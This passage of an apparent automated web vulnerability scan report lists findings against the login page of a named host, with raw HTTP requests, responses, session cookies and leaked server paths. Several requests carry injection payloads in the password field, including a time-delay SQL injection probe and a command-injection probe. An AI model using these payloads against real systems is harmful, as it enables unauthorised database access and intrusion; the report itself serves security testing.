	function Login()
	{
		MainForm.submit()
	}	
	
	function ResetPassword()
	{
	    var url = &quot;/AccountManager/ResetPassword/index.asp&quot;;
	    var name = &quot;WINDOW_RESETPASS&quot;;
	    var features = &quot;width=500,height=370&quot;;
	    
	    window.open(url,name, features)
	}   
	
	&lt;/script&gt;

&lt;/head&gt;

&lt;body&gt;

	&lt;table class=&quot;SiteTable&quot; id=&quot;table2&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot; style=&quot;border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px&quot;&gt;
		&lt;img border=&quot;0&quot; src=&quot;App_Themes/Default/defaul2.gif&quot;&gt;&lt;/td&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot;&gt;&lt;div class = &quot;loggedInAs&quot;&gt;
		
			&lt;form method=&quot;POST&quot; action=&quot;vindico_dynamic.asp&quot; name = &quot;MainForm&quot;&gt;
				&lt;table cellpadding=&quot;0&quot; width=&quot;317&quot; style=&quot;border-collapse: collapse&quot; border=&quot;1&quot; bordercolor=&quot;#C0C0C0&quot; id=&quot;table3&quot; height=&quot;152&quot;&gt;
				&lt;tr&gt;
					&lt;td height=&quot;152&quot; bgcolor=&quot;#E7E7D6&quot;&gt;
						&lt;div align=&quot;center&quot;&gt;
						&lt;table cellpadding=&quot;0&quot; style=&quot;border-collapse: collapse&quot; id=&quot;table4&quot; width=&quot;247&quot; height=&quot;85&quot;&gt;
							
							&lt;tr&gt;
								&lt;td width=&quot;247&quot; height=&quot;33&quot; colspan=&quot;2&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							
							
							&lt;tr&gt;
								&lt;td width=&quot;64&quot; height=&quot;33&quot;&gt;&lt;b&gt;Username:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;33&quot;&gt;&lt;input type=&quot;text&quot; name=&quot;username&quot; size=&quot;15&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td width=&quot;64&quot;  height=&quot;25&quot;&gt;&lt;b&gt;Password:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;25&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot; size=&quot;8&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td colspan=&quot;2&quot; align=&quot;left&quot; height=&quot;21&quot;&gt;
								    &lt;br /&gt;
								    &lt;input name=&quot;loginBtn&quot;          class=&quot;button&quot; type=&quot;submit&quot; value = &quot;Login&quot; onclick = &quot;Login();&quot;/&gt;
								    &lt;input name=&quot;resetPasswordBtn&quot;  class=&quot;button&quot; type=&quot;button&quot; value = &quot;Reset Password&quot; onclick = &quot;ResetPassword()&quot;/&gt;
								&lt;/td&gt;
							&lt;/tr&gt;
						&lt;/table&gt;
						&lt;/div&gt;
					&lt;/td&gt;
				&lt;/tr&gt;
				&lt;/table&gt;
			&lt;/form&gt;
		&lt;/div&gt;&lt;/td&gt;
	&lt;/tr&gt;
	&lt;/table&gt;

&lt;/body&gt;

&lt;/html&gt; ]]></rawresponse>

		<extrainformation>
			<info name="Identified Cookie">ASPSESSIONIDSQCRCQDD</info>
		</extrainformation>


        <classification>
            <OWASP>A6</OWASP>
            <WASC>15</WASC>
            <CWE>16</CWE>
            <CAPEC></CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>DatabaseErrorMessages</type>
		<severity>Low</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>%27%26%20SET%20%2FA%200xFFF9999-2%20%26</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=NPKJIJIDCLHCDOGAIKODKEFK
Content-Length: 63
Accept-Encoding: gzip, deflate

password=%27%26%20SET%20%2FA%200xFFF9999-2%20%26&amp;username=Smith
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:28 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Incorrect syntax near &apos;&amp;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A6</OWASP>
            <WASC>13</WASC>
            <CWE>200</CWE>
            <CAPEC>118</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/</url>
		<type>ForbiddenResource</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET /AccountManager/ResetPassword/ HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT
Content-Length: 5474


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt; 
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt; 
&lt;head&gt; 
&lt;title&gt;IIS 7.0 Detailed Error - 403.14 - Forbidden&lt;/title&gt; 
&lt;style type=&quot;text/css&quot;&gt; 
&lt;!-- 
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} 
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} 
.config_source code{font-size:.8em;color:#000000;} 
pre{margin:0;font-size:1.4em;word-wrap:break-word;} 
ul,ol{margin:10px 0 10px 40px;} 
ul.first,ol.first{margin-top:5px;} 
fieldset{padding:0 15px 10px 15px;} 
.summary-container fieldset{padding-bottom:5px;margin-top:4px;} 
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} 
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; 
 border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; 
 border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} 
a:link,a:visited{color:#007EFF;font-weight:bold;} 
a:hover{text-decoration:none;} 
h1{font-size:2.4em;margin:0;color:#FFF;} 
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} 
h4{font-size:1.2em;margin:10px 0 5px 0; 
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:&quot;trebuchet MS&quot;,Verdana,sans-serif; 
 color:#FFF;background-color:#5C87B2; 
}#content{margin:0 0 0 2%;position:relative;} 
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} 
.config_source{background:#fff5c4;} 
.content-container p{margin:0 0 10px 0; 
}#details-left{width:35%;float:left;margin-right:2%; 
}#details-right{width:63%;float:left; 
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; 
 background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; 
 font-size:1em;color:#FFF;text-align:right; 
}#server_version p{margin:5px 0;} 
table{margin:4px 0 4px 0;width:100%;border:none;} 
td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} 
th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} 
thead th{background-color:#ebebeb;width:25%; 
}#details-right th{width:20%;} 
table tr.alt td,table tr.alt th{background-color:#ebebeb;} 
.highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} 
.clear{clear:both;} 
.preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} 
--&gt; 
&lt;/style&gt; 
 
&lt;/head&gt; 
&lt;body&gt; 
&lt;div id=&quot;header&quot;&gt;&lt;h1&gt;Server Error in Application &quot;LOGIN.VINDICOSUITE.COM&quot;&lt;/h1&gt;&lt;/div&gt; 
&lt;div id=&quot;server_version&quot;&gt;&lt;p&gt;Internet Information Services 7.0&lt;/p&gt;&lt;/div&gt; 
&lt;div id=&quot;content&quot;&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Error Summary&lt;/legend&gt; 
  &lt;h2&gt;HTTP Error 403.14 - Forbidden&lt;/h2&gt; 
  &lt;h3&gt;The Web server is configured to not list the contents of this directory.&lt;/h3&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Detailed Error Information&lt;/legend&gt; 
  &lt;div id=&quot;details-left&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Module&lt;/th&gt;&lt;td&gt;DirectoryListingModule&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Notification&lt;/th&gt;&lt;td&gt;ExecuteRequestHandler&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Handler&lt;/th&gt;&lt;td&gt;StaticFile&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Error Code&lt;/th&gt;&lt;td&gt;0x00000000&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
  &lt;/div&gt; 
  &lt;div id=&quot;details-right&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Requested URL&lt;/th&gt;&lt;td&gt;http://login.vindicosuite.com:80/AccountManager/ResetPassword/&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Physical Path&lt;/th&gt;&lt;td&gt;d:\inetpub\login.vindicosuite.com\AccountManager\ResetPassword\&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Logon Method&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Logon User&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
   &lt;div class=&quot;clear&quot;&gt;&lt;/div&gt; 
  &lt;/div&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Most likely causes:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;A default document is not configured for the requested URL, and directory browsing is not enabled on the server.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Things you can try:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.&lt;/li&gt; 	&lt;li&gt;           Enable directory browsing using IIS Manager.           &lt;ol&gt; 			&lt;li&gt;Open IIS Manager.&lt;/li&gt; 			&lt;li&gt;In the Features view, double-click Directory Browsing.&lt;/li&gt; 			&lt;li&gt;On the Directory Browsing page, in the Actions pane, click Enable.&lt;/li&gt; 		&lt;/ol&gt; 	&lt;/li&gt; 	&lt;li&gt;Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
 
 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Links and More Information&lt;/legend&gt; 
  This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. 
  &lt;p&gt;&lt;a href=&quot;http://go.microsoft.com/fwlink/?LinkID=62293&amp;amp;IIS70Error=403,14,0x00000000,6002&quot;&gt;View more information &amp;raquo;&lt;/a&gt;&lt;/p&gt; 
   
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;/div&gt; 
&lt;/body&gt; 
&lt;/html&gt; 
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>

				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>MSSQLIdentified</type>
		<severity>Information</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=NPKJIJIDCLHCDOGAIKODKEFK
Content-Length: 60
Accept-Encoding: gzip, deflate

password=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;username=Smith
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:28 GMT


&lt;head&gt;&lt;title&gt;Object moved&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;&lt;h1&gt;Object Moved&lt;/h1&gt;This object may be found &lt;a HREF=&quot;/default.asp?message=Invalid%20Username%20and%20or%20Password&quot;&gt;here&lt;/a&gt;.&lt;/body&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>

				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>http://login.vindicosuite.com/</url>
		<type>IISVersionDisclosure</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=MPKJIJIDECIBEIEOOMMPHLGN; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT




&lt;html&gt;

&lt;head&gt;
	&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=windows-1252&quot;&gt;
	&lt;META HTTP-EQUIV=&quot;CACHE-CONTROL&quot; CONTENT=&quot;NO-CACHE&quot;&gt;
	
	&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;App_Themes/Default/vindico.css&quot;&gt;
	
	&lt;script type=&quot;text/javascript&quot;&gt;
	function Login()
	{
		MainForm.submit()
	}	
	
	function ResetPassword()
	{
	    var url = &quot;/AccountManager/ResetPassword/index.asp&quot;;
	    var name = &quot;WINDOW_RESETPASS&quot;;
	    var features = &quot;width=500,height=370&quot;;
	    
	    window.open(url,name, features)
	}   
	
	&lt;/script&gt;

&lt;/head&gt;

&lt;body&gt;

	&lt;table class=&quot;SiteTable&quot; id=&quot;table2&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot; style=&quot;border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px&quot;&gt;
		&lt;img border=&quot;0&quot; src=&quot;App_Themes/Default/defaul2.gif&quot;&gt;&lt;/td&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot;&gt;&lt;div class = &quot;loggedInAs&quot;&gt;
		
			&lt;form method=&quot;POST&quot; action=&quot;vindico_dynamic.asp&quot; name = &quot;MainForm&quot;&gt;
				&lt;table cellpadding=&quot;0&quot; width=&quot;317&quot; style=&quot;border-collapse: collapse&quot; border=&quot;1&quot; bordercolor=&quot;#C0C0C0&quot; id=&quot;table3&quot; height=&quot;152&quot;&gt;
				&lt;tr&gt;
					&lt;td height=&quot;152&quot; bgcolor=&quot;#E7E7D6&quot;&gt;
						&lt;div align=&quot;center&quot;&gt;
						&lt;table cellpadding=&quot;0&quot; style=&quot;border-collapse: collapse&quot; id=&quot;table4&quot; width=&quot;247&quot; height=&quot;85&quot;&gt;
							
							&lt;tr&gt;
								&lt;td width=&quot;247&quot; height=&quot;33&quot; colspan=&quot;2&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							
							
							&lt;tr&gt;
								&lt;td width=&quot;64&quot; height=&quot;33&quot;&gt;&lt;b&gt;Username:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;33&quot;&gt;&lt;input type=&quot;text&quot; name=&quot;username&quot; size=&quot;15&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td width=&quot;64&quot;  height=&quot;25&quot;&gt;&lt;b&gt;Password:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;25&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot; size=&quot;8&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td colspan=&quot;2&quot; align=&quot;left&quot; height=&quot;21&quot;&gt;
								    &lt;br /&gt;
								    &lt;input name=&quot;loginBtn&quot;          class=&quot;button&quot; type=&quot;submit&quot; value = &quot;Login&quot; onclick = &quot;Login();&quot;/&gt;
								    &lt;input name=&quot;resetPasswordBtn&quot;  class=&quot;button&quot; type=&quot;button&quot; value = &quot;Reset Password&quot; onclick = &quot;ResetPassword()&quot;/&gt;
								&lt;/td&gt;
							&lt;/tr&gt;
						&lt;/table&gt;
						&lt;/div&gt;
					&lt;/td&gt;
				&lt;/tr&gt;
				&lt;/table&gt;
			&lt;/form&gt;
		&lt;/div&gt;&lt;/td&gt;
	&lt;/tr&gt;
	&lt;/table&gt;

&lt;/body&gt;

&lt;/html&gt; ]]></rawresponse>

		<extrainformation>
			<info name="Extracted Version">Microsoft-IIS/7.0</info>
		</extrainformation>


        <classification>
            <OWASP>A6</OWASP>
            <WASC>13</WASC>
            <CWE></CWE>
            <CAPEC></CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/</url>
		<type>PossibleInternalWindowsPathLeakage</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET /AccountManager/ResetPassword/ HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT
Content-Length: 5474


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt; 
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt; 
&lt;head&gt; 
&lt;title&gt;IIS 7.0 Detailed Error - 403.14 - Forbidden&lt;/title&gt; 
&lt;style type=&quot;text/css&quot;&gt; 
&lt;!-- 
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} 
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} 
.config_source code{font-size:.8em;color:#000000;} 
pre{margin:0;font-size:1.4em;word-wrap:break-word;} 
ul,ol{margin:10px 0 10px 40px;} 
ul.first,ol.first{margin-top:5px;} 
fieldset{padding:0 15px 10px 15px;} 
.summary-container fieldset{padding-bottom:5px;margin-top:4px;} 
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} 
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; 
 border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; 
 border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} 
a:link,a:visited{color:#007EFF;font-weight:bold;} 
a:hover{text-decoration:none;} 
h1{font-size:2.4em;margin:0;color:#FFF;} 
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} 
h4{font-size:1.2em;margin:10px 0 5px 0; 
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:&quot;trebuchet MS&quot;,Verdana,sans-serif; 
 color:#FFF;background-color:#5C87B2; 
}#content{margin:0 0 0 2%;position:relative;} 
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} 
.config_source{background:#fff5c4;} 
.content-container p{margin:0 0 10px 0; 
}#details-left{width:35%;float:left;margin-right:2%; 
}#details-right{width:63%;float:left; 
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; 
 background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; 
 font-size:1em;color:#FFF;text-align:right; 
}#server_version p{margin:5px 0;} 
table{margin:4px 0 4px 0;width:100%;border:none;} 
td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} 
th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} 
thead th{background-color:#ebebeb;width:25%; 
}#details-right th{width:20%;} 
table tr.alt td,table tr.alt th{background-color:#ebebeb;} 
.highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} 
.clear{clear:both;} 
.preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} 
--&gt; 
&lt;/style&gt; 
 
&lt;/head&gt; 
&lt;body&gt; 
&lt;div id=&quot;header&quot;&gt;&lt;h1&gt;Server Error in Application &quot;LOGIN.VINDICOSUITE.COM&quot;&lt;/h1&gt;&lt;/div&gt; 
&lt;div id=&quot;server_version&quot;&gt;&lt;p&gt;Internet Information Services 7.0&lt;/p&gt;&lt;/div&gt; 
&lt;div id=&quot;content&quot;&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Error Summary&lt;/legend&gt; 
  &lt;h2&gt;HTTP Error 403.14 - Forbidden&lt;/h2&gt; 
  &lt;h3&gt;The Web server is configured to not list the contents of this directory.&lt;/h3&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Detailed Error Information&lt;/legend&gt; 
  &lt;div id=&quot;details-left&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Module&lt;/th&gt;&lt;td&gt;DirectoryListingModule&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Notification&lt;/th&gt;&lt;td&gt;ExecuteRequestHandler&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Handler&lt;/th&gt;&lt;td&gt;StaticFile&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Error Code&lt;/th&gt;&lt;td&gt;0x00000000&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
  &lt;/div&gt; 
  &lt;div id=&quot;details-right&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Requested URL&lt;/th&gt;&lt;td&gt;http://login.vindicosuite.com:80/AccountManager/ResetPassword/&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Physical Path&lt;/th&gt;&lt;td&gt;d:\inetpub\login.vindicosuite.com\AccountManager\ResetPassword\&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Logon Method&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Logon User&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
   &lt;div class=&quot;clear&quot;&gt;&lt;/div&gt; 
  &lt;/div&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Most likely causes:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;A default document is not configured for the requested URL, and directory browsing is not enabled on the server.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Things you can try:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.&lt;/li&gt; 	&lt;li&gt;           Enable directory browsing using IIS Manager.           &lt;ol&gt; 			&lt;li&gt;Open IIS Manager.&lt;/li&gt; 			&lt;li&gt;In the Features view, double-click Directory Browsing.&lt;/li&gt; 			&lt;li&gt;On the Directory Browsing page, in the Actions pane, click Enable.&lt;/li&gt; 		&lt;/ol&gt; 	&lt;/li&gt; 	&lt;li&gt;Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
 
 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Links and More Information&lt;/legend&gt; 
  This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. 
  &lt;p&gt;&lt;a href=&quot;http://go.microsoft.com/fwlink/?LinkID=62293&amp;amp;IIS70Error=403,14,0x00000000,6002&quot;&gt;View more information &amp;raquo;&lt;/a&gt;&lt;/p&gt; 
   
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;/div&gt; 
&lt;/body&gt; 
&lt;/html&gt; 
 ]]></rawresponse>

		<extrainformation>
			<info name="Identified Internal Path(s)">d:\inetpub\login.vindicosuite.com\AccountManager\ResetPassword\</info>
		</extrainformation>


        <classification>
            <OWASP></OWASP>
            <WASC>13</WASC>
            <CWE>200</CWE>
            <CAPEC>118</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>http://login.vindicosuite.com/App_Themes/Default/</url>
		<type>PossibleInternalWindowsPathLeakage</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET /App_Themes/Default/ HTTP/1.1
Referer: http://login.vindicosuite.com/App_Themes/Default/vindico.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT
Content-Length: 5454


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt; 
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt; 
&lt;head&gt; 
&lt;title&gt;IIS 7.0 Detailed Error - 403.14 - Forbidden&lt;/title&gt; 
